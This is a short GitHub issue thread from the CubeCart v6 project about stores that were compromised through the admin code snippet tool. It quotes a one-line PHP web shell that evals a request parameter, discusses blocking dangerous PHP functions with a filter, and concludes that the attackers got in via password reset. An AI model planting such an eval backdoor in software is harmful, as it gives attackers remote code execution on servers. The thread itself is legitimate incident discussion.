### ISSUE TITLE
Safe PHP functions filter for code snippets

### ISSUE THREAD

**Issue by abrookbanks** [cubecart/v6#537]
In the last few days I've seen two hacked stores which have had a code snippet with code along the lines of:

```<?php eval($_REQUEST['ABC123']); ?>```

I think a preg_match needs to detect dangerous PHP functions to block from the code snippet tool.

**Comment by bhsmither** [comment]
My two-pence: that would be an ineffective approach.

Of course, by whatever manner this database record got into the database (then CubeCart puts the file in the folder when the trigger is loaded) needs to be discovered.

**Comment by abrookbanks** [comment]
Agreed ineffective. I saw three hacked stores where a code snipped was added hence the report. It turns out they logged in via reset password. I haven't found a way to SQL inject via password request form. This is closed for now.
